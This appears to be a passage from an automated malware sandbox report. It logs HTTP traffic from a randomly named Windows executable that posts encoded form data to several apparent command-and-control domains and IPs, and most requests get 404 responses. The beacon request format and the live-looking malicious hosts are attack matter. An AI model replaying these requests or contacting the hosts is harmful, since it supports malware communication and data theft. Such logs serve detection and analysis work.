                                                                        Nov 9, 2024 05:38:20.392112970 CET1236INHTTP/1.1 404 Not Found
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: close
                                                                        Date: Sat, 09 Nov 2024 04:38:20 GMT
                                                                        Server: Apache
                                                                        X-Powered-By: PHP/7.4.33
                                                                        Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                        Cache-Control: no-cache, must-revalidate, max-age=0
                                                                        Link: <https://eyecatch.pro/wp-json/>; rel="https://api.w.org/"
                                                                        Content-Encoding: gzip
                                                                        Data Raw: 32 36 62 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ed 7d 7b 73 db 46 b2 ef df d6 a7 80 e9 5a 9b 4c 08 10 00 df 94 a8 9c 8d e2 9c cd bd f1 71 2a 4e ea d4 dd f5 96 0b 24 41 11 36 49 70 01 50 8f d5 ea bb df 5f f7 cc 00 03 10 7c 88 b4 53 e7 e1 c4 92 48 a0 a7 bb a7 a7 a7 1f f3 bc 78 fe c3 db ab df fe df 2f af 8d 59 b2 98 5f 9e 5d d0 1f 63 ee 2d af 87 15 7f 69 fe fb f7 15 63 3c f7 e2 78 58 59 86 e6 c7 b8 42 10 be 37 b9 3c 7b 76 b1 f0 13 cf 18 cf bc 28 f6 93 61 e5 f7 df 7e 34 7b 15 a3 91 be 59 7a 0b 7f 58 b9 09 fc db 55 18 25 40 13 2e 13 7f 09 c8 db 60 92 cc 86 13 ff 26 18 fb 26 7f a9 1b c1 32 48 02 6f 6e c6 63 6f ee 0f 1d 89 27 1e 47 c1 2a b9 ac 4e d7 cb 71 12 84 cb 2a 31 57 7b a0 df 16 73 f5 1f a0 61 0c 99 f5 ec 81 15 f9 ab b9 37 f6 ab 8d f7 23 66 fa fd a8 51 7f f5 31 7e 55 7b ac 55 27 e1 78 bd 00 1b 96 fa f0 7a ee d3 f7 da f9 45 43 92 3b bb 48 82 64 ee 5f fe e2 5d fb c6 32 4c 8c 69 b8 5e 4e 8c 97 2f 7a ae e3 9c 1b af ef fd 2b 2f 19 cf 8c 5f a2 f0 a2 21 40 cf 84 30 b8 ca af a2 70 14 26 f1 ab b4 c2 af 96 61 [TRUNCATED]
                                                                        Data Ascii: 26ba}{sFZLq*N$A6IpP_|SHx/Y_]c-ic<xXYB7<{v(a~4{YzXU%@.`&&2Honco'G*Nq*1W{sa7#fQ1~U{U'xzEC;Hd_]2Li^N/z+/_!@0p&awu yxt1+<#_Ajj5w9^WNxyX?+$YFb<VQ2&{.Hx~c1}?$12bh^ZooF-oNFzKPZ-%>26}-!*Pp]7nWfb#~wGYo 67['y/$'7i/a=1$w!^kI<I'oToNc($ w'aIVV{d#r)U45}_qRvv%},j=XMnr=X&MQW}<Rwz4DyZ2OM<u4g=
                                                                        Nov 9, 2024 05:38:20.392132044 CET1236INData Raw: 70 38 8c fe 96 fc fd b1 96 09 78 ad 04 1c df 06 e8 f7 68 88 87 31 34 aa 32 9d 7b d7 95 81 2c b8 04 50 e5 fd 7a d2 6b 8e f1 7b 3a 6d be 5f 4f 7d 7b fa 7e ed da f6 04 bf 3b 5e 57 3c 81 6e 6f 01 1b e5 c0 6a df 3d 77 06 cf f3 68 27 53 2f 2d 3b 99 36
                                                                        Data Ascii: p8xh142{,Pzk{:m_O}{~;^W<noj=wh'S/-;6uTD@/( F-~vm}S<5' QxB' Wx' ];&VAVSH|2v;\?rF[I^%'kju_O%!ypjg}#on/c>E_KA#}~;J
                                                                        Nov 9, 2024 05:38:20.392147064 CET424INData Raw: c1 8b 76 bb 7d 4e 51 8d 19 07 ff f4 07 4e 73 75 77 4e f6 55 0a 79 0c 7f ed 47 8f 56 10 9b 13 2f fa 24 48 19 87 63 9f f2 7f 5e e7 b1 50 e4 41 b6 35 9a 9a 34 44 7b 3d 0e 27 fe 83 54 3b 07 21 56 1c ce 83 89 f1 62 3c 1e 9f 8b a7 66 e4 4d 82 75 3c 68
                                                                        Data Ascii: v}NQNsuwNUyGV/$Hc^PA54D{='T;!Vb<fMu<hSf|Ao<#@//7O0rA4}8>%2"2k0SIe 1$(kJ@Y4Rl-+SJ~KiP3aQpE\h*XvNSB8Hz`b
                                                                        Nov 9, 2024 05:38:20.392230988 CET1236INData Raw: 60 cd b9 e5 b1 ab 41 d7 b6 37 0a 7e f8 30 5a a3 3b a4 d8 0b c6 37 35 9f 4d 52 76 c3 ea 90 be 3c 6e 98 04 f2 bd 2b 16 54 e6 89 6b 0f aa b0 23 b4 cc b5 18 49 8e 05 a4 6c 1e 86 f0 b8 28 5c a1 19 c2 68 07 c9 fd 83 fc 3b b0 5a 65 e0 ba 28 54 43 cb 5e
                                                                        Data Ascii: `A7~0Z;75MRv<n+Tk#Il(\h;Ze(TC^M9;[YwiR=MOP3'|5L&,|'!fhM0_mXBzDYc@wt;+daMnnL4#'nW#DP/2ZE|&ux\6?1&:XR
                                                                        Nov 9, 2024 05:38:20.392251968 CET1236INData Raw: af 09 bc ed dd dc 62 0e e5 69 82 75 48 a8 10 ff 0e 09 2c bc 3b b3 89 7c 43 08 d5 e5 b6 72 ac ed 02 70 db fb eb 4f 38 5b bd 14 a7 68 28 1a 04 da 22 56 d7 72 61 0a eb 46 ab b7 97 d5 8e ad d0 ee 97 6a d3 c2 a0 27 d0 76 76 4b 95 b8 ed 22 c7 13 12 68
                                                                        Data Ascii: biuH,;|CrpO8[h("VraFj'vvK"h%hZq%-h+`4]i[j @Hh{nm$/$k;;@RT$0x&41<*h(CyK6'um1\Vv+
                                                                        Nov 9, 2024 05:38:20.392263889 CET424INData Raw: 30 b7 93 43 62 53 4f 64 ab b8 6d ed 99 6a 83 1c a0 90 38 c3 6d 88 89 17 05 89 90 5f 0c 1f 33 e3 7b e5 ce b0 b5 bc 13 a0 e8 bc 38 73 26 e4 b6 17 5d b1 58 09 66 5e b0 70 20 3a 86 2d c1 91 2e 68 38 10 4f 0a 5f 82 4b 4c 12 63 6a f2 40 5c 29 7c 09 ae
                                                                        Data Ascii: 0CbSOdmj8m_3{8s&]Xf^p :-.h8O_KLcj@\)|tnIZ~b(\BaQSjFf!lR@b%9/TUVJd<vBx,"%$tt@L)|jTXS%X]iaR\eJ^`29bl`
                                                                        Nov 9, 2024 05:38:20.392277002 CET1236INData Raw: 5c a0 e1 93 7b 84 04 a5 1d c8 0f 8f 07 8e 40 7e 40 1c 70 04 d6 03 fd ff 11 98 85 99 7b 92 df 3f 82 4a c1 ed 8a bc b8 44 63 0a 70 d2 df 9f 4e f0 70 3f 7f 0c ad 63 fc fb 11 74 44 53 65 c9 73 89 fc f2 ce 18 cb 16 68 57 ff d3 ba 5e 1e 45 09 8d 82 0f
                                                                        Data Ascii: \{@~@p{?JDcpNp?ctDSeshW^E>HV*QAb>A~OG`?O0|CG~>}[0ZRe4-oMIg+cG{x0K()gCm5%<$_U^(XBysId7m
                                                                        Nov 9, 2024 05:38:20.392292023 CET1236INData Raw: b0 93 02 ae 3e 8a 56 63 6b 35 5b 7d 17 c5 b8 e3 88 ae 30 e2 9b a7 c4 fd 52 f2 0a 9c 30 d2 2e 98 c2 e9 f4 93 5f 60 31 63 43 5c a0 c3 97 52 3d bb 48 fd 73 45 f9 e7 7c 8f e3 f7 b1 e2 99 9c 0d 05 02 b8 f1 ea 19 fd a7 1b 34 af 4e cf 70 24 39 16 a3 8a
                                                                        Data Ascii: >Vck5[}0R0._`1cC\R=HsE|4Np$9%NiXEppo[XTEM4ME)btM1+J:0gJc>M9Q!+zINl88.CDJBdz F
                                                                        Nov 9, 2024 05:38:20.392304897 CET1236INData Raw: 9c 52 45 3a 18 b7 26 24 9d 6e b3 d5 e9 a0 5d 90 d0 e3 0e ba 7e a7 95 7b aa c9 40 03 06 91 7e 1f 72 ef 40 f2 38 09 ce 69 77 fb 38 75 b6 89 73 e3 9a 2d a7 d7 6c e6 64 92 3d bd 72 db aa 9c 0e ec 42 07 44 b9 ba 86 58 7b aa cb 48 7f dc 51 a4 71 bc 59
                                                                        Data Ascii: RE:&$n]~{@~r@8iw8us-ld=rBDX{HQqY"s=b$Q),d!$n84n#X]kp*kRp~BE0?X ?l"WP@:_atj<A],adDxy-c}905?D
                                                                        Nov 9, 2024 05:38:20.392327070 CET801INData Raw: 47 b4 13 16 64 d2 92 34 09 cb f3 9f 26 4d 80 d2 74 f3 94 ae 3d 67 d4 90 ab 48 2f 15 20 25 db 2a d9 e5 80 85 20 9c dc 5b 39 e0 ff 36 5c c5 cf 31 ca e3 25 38 a0 1b 53 ca 63 6f f9 32 c2 05 8d e1 79 42 c3 38 4c 03 63 30 33 47 a0 c9 cb 9e d7 0f 4a 3a
                                                                        Data Ascii: Gd4&Mt=gH/ %* [96\1%8Sco2yB8Lc03GJ:mH4Y1Ia}.3ozg<pSFS.b`ICS1^sSrS_*NU|$&0NU`C- u|k2cNe@#


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        44192.168.2.550025217.160.0.220803660C:\Program Files (x86)\rBqzZzzHcmwzxiopDSMsktNKnyKFJzhHHmutzYqlidQUGbRoAWJSJLqnMwXwwzM\MKVNVRSuoK.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Nov 9, 2024 05:38:22.013318062 CET488OUTGET /42c3/?J8LHgDJp=JBDdfBWF/aARUf0PyG02RiIz2qli5PW+5nwTlGpfB1DrZY6QfIB5cxII436r+j2NvU2wp2AeqQG6cs1IYMUL87i7oiU5+htQ/rMuVW1JPNoYDo0Ha8BBXEhHg5ia/a4jMw==&aF=JLp4o0Qx2F-p4F HTTP/1.1
                                                                        Host: www.eyecatch.pro
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                        Accept-Language: en-US,en;q=0.5
                                                                        Connection: close
                                                                        User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; One X Build/KTU84Q) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
                                                                        Nov 9, 2024 05:38:22.966653109 CET521INHTTP/1.1 301 Moved Permanently
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: close
                                                                        Date: Sat, 09 Nov 2024 04:38:22 GMT
                                                                        Server: Apache
                                                                        X-Powered-By: PHP/7.4.33
                                                                        Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                        Cache-Control: no-cache, must-revalidate, max-age=0
                                                                        X-Redirect-By: WordPress
                                                                        Location: http://eyecatch.pro/42c3/?J8LHgDJp=JBDdfBWF/aARUf0PyG02RiIz2qli5PW+5nwTlGpfB1DrZY6QfIB5cxII436r+j2NvU2wp2AeqQG6cs1IYMUL87i7oiU5+htQ/rMuVW1JPNoYDo0Ha8BBXEhHg5ia/a4jMw==&aF=JLp4o0Qx2F-p4F
                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                        Data Ascii: 0


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        45192.168.2.55002638.47.207.164803660C:\Program Files (x86)\rBqzZzzHcmwzxiopDSMsktNKnyKFJzhHHmutzYqlidQUGbRoAWJSJLqnMwXwwzM\MKVNVRSuoK.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Nov 9, 2024 05:38:28.385512114 CET734OUTPOST /fjmy/ HTTP/1.1
                                                                        Host: www.t95yd.top
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                        Accept-Language: en-US,en;q=0.5
                                                                        Accept-Encoding: gzip, deflate, br
                                                                        Content-Length: 209
                                                                        Cache-Control: max-age=0
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Connection: close
                                                                        Origin: http://www.t95yd.top
                                                                        Referer: http://www.t95yd.top/fjmy/
                                                                        User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; One X Build/KTU84Q) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
                                                                        Data Raw: 4a 38 4c 48 67 44 4a 70 3d 52 37 68 71 2f 46 54 74 51 4c 56 4a 38 6d 62 35 68 44 38 59 6d 6c 64 42 6e 38 6e 6b 65 39 4b 33 36 4d 75 61 45 46 4a 36 35 67 37 53 6e 52 41 6a 4e 58 43 62 7a 5a 52 34 59 45 64 59 30 69 4e 45 44 78 77 61 61 42 74 37 78 44 78 46 6b 46 62 64 73 41 47 4a 6d 65 6e 50 64 6b 55 38 57 57 37 36 37 75 79 76 62 4c 75 33 78 2b 74 52 37 4f 41 32 48 72 53 49 73 35 51 41 66 35 6c 31 37 4b 51 6b 66 69 47 61 4b 4c 6f 68 79 30 58 7a 6a 30 4a 45 48 73 46 30 54 72 67 75 4c 2b 56 30 62 31 56 64 48 76 73 69 73 50 6e 62 30 70 50 46 46 36 53 61 6e 74 4e 48 67 6a 61 72 78 57 53 59 35 74 63 35 63 4a 4a 36 48 32 49 3d
                                                                        Data Ascii: J8LHgDJp=R7hq/FTtQLVJ8mb5hD8YmldBn8nke9K36MuaEFJ65g7SnRAjNXCbzZR4YEdY0iNEDxwaaBt7xDxFkFbdsAGJmenPdkU8WW767uyvbLu3x+tR7OA2HrSIs5QAf5l17KQkfiGaKLohy0Xzj0JEHsF0TrguL+V0b1VdHvsisPnb0pPFF6SantNHgjarxWSY5tc5cJJ6H2I=
                                                                        Nov 9, 2024 05:38:29.319983006 CET302INHTTP/1.1 404 Not Found
                                                                        Server: nginx
                                                                        Date: Sat, 09 Nov 2024 04:38:29 GMT
                                                                        Content-Type: text/html
                                                                        Content-Length: 138
                                                                        Connection: close
                                                                        ETag: "669534fa-8a"
                                                                        Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e
                                                                        Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        46192.168.2.55002738.47.207.164803660C:\Program Files (x86)\rBqzZzzHcmwzxiopDSMsktNKnyKFJzhHHmutzYqlidQUGbRoAWJSJLqnMwXwwzM\MKVNVRSuoK.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Nov 9, 2024 05:38:30.926441908 CET754OUTPOST /fjmy/ HTTP/1.1
                                                                        Host: www.t95yd.top
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                        Accept-Language: en-US,en;q=0.5
                                                                        Accept-Encoding: gzip, deflate, br
                                                                        Content-Length: 229
                                                                        Cache-Control: max-age=0
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Connection: close
                                                                        Origin: http://www.t95yd.top
                                                                        Referer: http://www.t95yd.top/fjmy/
                                                                        User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; One X Build/KTU84Q) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
                                                                        Data Raw: 4a 38 4c 48 67 44 4a 70 3d 52 37 68 71 2f 46 54 74 51 4c 56 4a 38 48 72 35 74 46 30 59 67 46 64 4f 6f 63 6e 6b 55 64 4c 2b 36 4d 71 61 45 45 4d 39 2b 53 66 53 6d 30 6b 6a 4d 55 61 62 67 70 52 34 41 30 63 63 71 53 4d 49 44 78 4d 6f 61 41 42 37 78 44 56 46 6b 41 6e 64 72 7a 65 57 6e 4f 6e 4e 56 45 55 2b 49 6d 37 36 37 75 79 76 62 4c 54 51 78 39 64 52 37 66 77 32 47 4b 53 4c 68 5a 51 44 4f 35 6c 31 2f 4b 51 67 66 69 47 34 4b 4f 49 62 79 78 54 7a 6a 78 74 45 43 75 39 33 61 72 67 6f 57 4f 55 61 66 30 49 6e 65 63 30 59 72 66 57 30 6b 4b 6a 38 41 4d 6a 77 39 50 46 76 7a 44 32 54 68 46 61 76 6f 64 39 51 47 71 5a 4b 5a 68 65 78 6d 67 7a 43 33 41 67 38 36 43 77 6a 30 4c 52 74 67 71 53 6d
                                                                        Data Ascii: J8LHgDJp=R7hq/FTtQLVJ8Hr5tF0YgFdOocnkUdL+6MqaEEM9+SfSm0kjMUabgpR4A0ccqSMIDxMoaAB7xDVFkAndrzeWnOnNVEU+Im767uyvbLTQx9dR7fw2GKSLhZQDO5l1/KQgfiG4KOIbyxTzjxtECu93argoWOUaf0Inec0YrfW0kKj8AMjw9PFvzD2ThFavod9QGqZKZhexmgzC3Ag86Cwj0LRtgqSm
                                                                        Nov 9, 2024 05:38:31.881047010 CET302INHTTP/1.1 404 Not Found
                                                                        Server: nginx
                                                                        Date: Sat, 09 Nov 2024 04:38:31 GMT
                                                                        Content-Type: text/html
                                                                        Content-Length: 138
                                                                        Connection: close
                                                                        ETag: "669534fa-8a"
                                                                        Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e
                                                                        Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        47192.168.2.55002838.47.207.164803660C:\Program Files (x86)\rBqzZzzHcmwzxiopDSMsktNKnyKFJzhHHmutzYqlidQUGbRoAWJSJLqnMwXwwzM\MKVNVRSuoK.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Nov 9, 2024 05:38:33.479875088 CET1771OUTPOST /fjmy/ HTTP/1.1
                                                                        Host: www.t95yd.top
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                        Accept-Language: en-US,en;q=0.5
                                                                        Accept-Encoding: gzip, deflate, br
                                                                        Content-Length: 1245
                                                                        Cache-Control: max-age=0
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Connection: close
                                                                        Origin: http://www.t95yd.top
                                                                        Referer: http://www.t95yd.top/fjmy/
                                                                        User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; One X Build/KTU84Q) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
                                                                        Data Raw: 4a 38 4c 48 67 44 4a 70 3d 52 37 68 71 2f 46 54 74 51 4c 56 4a 38 48 72 35 74 46 30 59 67 46 64 4f 6f 63 6e 6b 55 64 4c 2b 36 4d 71 61 45 45 4d 39 2b 53 58 53 6d 43 6f 6a 4e 31 61 62 6a 70 52 34 65 45 63 52 71 53 4d 46 44 78 55 73 61 41 64 42 78 42 64 46 6b 6d 7a 64 75 43 65 57 74 4f 6e 4e 5a 6b 55 6a 57 57 37 6a 37 75 43 7a 62 4c 6a 51 78 39 64 52 37 63 6f 32 51 72 53 4c 6e 5a 51 41 66 35 6c 44 37 4b 52 48 66 69 75 43 4b 4f 4d 4c 79 43 62 7a 36 52 39 45 46 4c 70 33 56 72 67 71 47 65 55 30 66 30 45 43 65 66 52 6a 72 66 53 4e 6b 4a 44 38 44 39 50 76 6c 72 64 76 6e 6a 75 30 6c 47 43 58 2f 36 6c 58 5a 72 56 4a 55 52 36 76 37 44 72 52 30 30 55 6e 33 57 78 75 68 74 56 6f 6d 50 37 4e 66 38 68 6b 32 78 6b 33 5a 42 38 4c 77 4f 6c 76 64 35 59 34 4e 4f 69 63 57 54 35 6e 51 53 32 68 75 65 49 57 4b 32 62 34 32 71 6f 53 4d 2b 75 63 68 7a 77 37 4c 48 57 71 6f 4e 41 48 4d 65 6d 72 4a 34 51 31 4e 30 7a 33 69 4b 41 32 67 71 42 47 47 4c 37 46 2b 62 72 68 4f 59 79 59 6b 4a 42 54 78 50 54 48 4e 61 6f 37 69 34 30 7a 48 [TRUNCATED]
                                                                        Data Ascii: J8LHgDJp=R7hq/FTtQLVJ8Hr5tF0YgFdOocnkUdL+6MqaEEM9+SXSmCojN1abjpR4eEcRqSMFDxUsaAdBxBdFkmzduCeWtOnNZkUjWW7j7uCzbLjQx9dR7co2QrSLnZQAf5lD7KRHfiuCKOMLyCbz6R9EFLp3VrgqGeU0f0ECefRjrfSNkJD8D9Pvlrdvnju0lGCX/6lXZrVJUR6v7DrR00Un3WxuhtVomP7Nf8hk2xk3ZB8LwOlvd5Y4NOicWT5nQS2hueIWK2b42qoSM+uchzw7LHWqoNAHMemrJ4Q1N0z3iKA2gqBGGL7F+brhOYyYkJBTxPTHNao7i40zHqEzKPAJU4oMeapogMD2L3Pp9PhctVRVBXN7i+9wH7h9uCBtCTSJbNIYGC+EhKs5eOARTq9rmUUyV505AeqLP9e4ztrBxztylN3Kp0Bhag3iWzVSuTdFH9XE9ptArYZQOD4zu3OYYGFu7PjIUA6/DcT0vpDvrvdzF4e6Tj3n6snTGBRYCyhMCCCEH+8I6QUXeP/DRFvg5ZUaWjE+HhXCPKxQtbiaTp9f0GRaJhU18+NqqOBc9ZjVJmEhoR4Aal3QsegSEo3kzeuh8GRbgN4Wv4T4gmKD/WZQ2CfXa9aXcx8zeuu48c2wF40Fq6vokGaYOf0i5mbO6YzIP6WF6y5mVHeka1Fj2d9N2xZ0t0quImszBi5NHZg19SIpcBBeyvrkNAoeplMiR/L3arIlxh2kztelV7o/nhemHXI/+4ilxddqO+jan9CzoxYSF/Mr/9H1gmcp1VJru38i0y59rgiOI5Aw8SDdBFCKAWYRP+NYAnWx6jXCOc+cYTeFAgQQrbMGhL+xzqXvEkm2/Cbp7sjAuDhNoFhe/+DnRT7WaaVFhhfTmo2z2oeVGean/tw3dO2vC2AkDUwOl0WgmNLZrDJBt+iqgyz81jMGLxjb8DTK/aXF7mEFZTFFJixrAoZ2Kqd1OR12cp6BjAYG4rJnAvKkdr3FlDkAprn564L [TRUNCATED]
                                                                        Nov 9, 2024 05:38:34.422512054 CET302INHTTP/1.1 404 Not Found
                                                                        Server: nginx
                                                                        Date: Sat, 09 Nov 2024 04:38:34 GMT
                                                                        Content-Type: text/html
                                                                        Content-Length: 138
                                                                        Connection: close
                                                                        ETag: "669534fa-8a"
                                                                        Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e
                                                                        Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        48192.168.2.55002938.47.207.164803660C:\Program Files (x86)\rBqzZzzHcmwzxiopDSMsktNKnyKFJzhHHmutzYqlidQUGbRoAWJSJLqnMwXwwzM\MKVNVRSuoK.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Nov 9, 2024 05:38:36.023209095 CET485OUTGET /fjmy/?J8LHgDJp=c5JK8yKqbpJXnVX35yNvpk4it4zCfLCuqqKaPXgDxgb5kUsYKBWi9fZhBVM/jAdIGDw0KxxisAN8tQ7jqzqBhav6DGIeWiTI6vrrd/bXxPUrtdAQLIqbusoQJp9p3rxIBg==&aF=JLp4o0Qx2F-p4F HTTP/1.1
                                                                        Host: www.t95yd.top
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                        Accept-Language: en-US,en;q=0.5
                                                                        Connection: close
                                                                        User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; One X Build/KTU84Q) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
                                                                        Nov 9, 2024 05:38:36.960408926 CET302INHTTP/1.1 404 Not Found
                                                                        Server: nginx
                                                                        Date: Sat, 09 Nov 2024 04:38:36 GMT
                                                                        Content-Type: text/html
                                                                        Content-Length: 138
                                                                        Connection: close
                                                                        ETag: "669534fa-8a"
                                                                        Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e
                                                                        Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        49192.168.2.55003013.248.169.48803660C:\Program Files (x86)\rBqzZzzHcmwzxiopDSMsktNKnyKFJzhHHmutzYqlidQUGbRoAWJSJLqnMwXwwzM\MKVNVRSuoK.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Nov 9, 2024 05:38:42.226252079 CET743OUTPOST /xlhb/ HTTP/1.1
                                                                        Host: www.sonoscan.org
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                        Accept-Language: en-US,en;q=0.5
                                                                        Accept-Encoding: gzip, deflate, br
                                                                        Content-Length: 209
                                                                        Cache-Control: max-age=0
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Connection: close
                                                                        Origin: http://www.sonoscan.org
                                                                        Referer: http://www.sonoscan.org/xlhb/
                                                                        User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; One X Build/KTU84Q) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
                                                                        Data Raw: 4a 38 4c 48 67 44 4a 70 3d 62 42 4f 6b 6e 79 74 69 41 65 41 79 37 43 34 4b 61 6d 4e 7a 62 34 7a 4c 4e 68 69 50 7a 55 34 4b 33 66 79 33 2b 44 71 6f 4e 36 4d 61 6d 30 6b 68 6a 2f 30 75 6c 4d 53 33 61 2b 32 69 30 55 63 4c 6a 6d 61 33 4d 41 34 31 4a 6d 6b 63 7a 51 6d 6d 49 63 4f 36 6a 66 42 75 57 37 77 61 56 47 79 6f 2f 74 62 78 41 49 37 36 37 42 74 68 43 57 50 34 57 44 65 64 45 43 51 43 44 6c 70 79 49 5a 54 68 70 79 44 2f 2b 35 67 67 2b 63 63 64 33 6c 6a 4d 38 79 59 4d 49 59 4c 4e 38 6d 4e 46 61 39 32 5a 74 66 41 37 43 49 39 5a 6d 34 6c 7a 70 4e 64 78 61 66 6f 6b 35 56 53 66 68 52 6d 79 55 59 75 55 4e 76 32 38 4e 6d 67 3d
                                                                        Data Ascii: J8LHgDJp=bBOknytiAeAy7C4KamNzb4zLNhiPzU4K3fy3+DqoN6Mam0khj/0ulMS3a+2i0UcLjma3MA41JmkczQmmIcO6jfBuW7waVGyo/tbxAI767BthCWP4WDedECQCDlpyIZThpyD/+5gg+ccd3ljM8yYMIYLN8mNFa92ZtfA7CI9Zm4lzpNdxafok5VSfhRmyUYuUNv28Nmg=


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        50192.168.2.55003113.248.169.48803660C:\Program Files (x86)\rBqzZzzHcmwzxiopDSMsktNKnyKFJzhHHmutzYqlidQUGbRoAWJSJLqnMwXwwzM\MKVNVRSuoK.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Nov 9, 2024 05:38:44.774008989 CET763OUTPOST /xlhb/ HTTP/1.1
                                                                        Host: www.sonoscan.org
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                        Accept-Language: en-US,en;q=0.5
                                                                        Accept-Encoding: gzip, deflate, br
                                                                        Content-Length: 229
                                                                        Cache-Control: max-age=0
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Connection: close
                                                                        Origin: http://www.sonoscan.org
                                                                        Referer: http://www.sonoscan.org/xlhb/
                                                                        User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; One X Build/KTU84Q) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
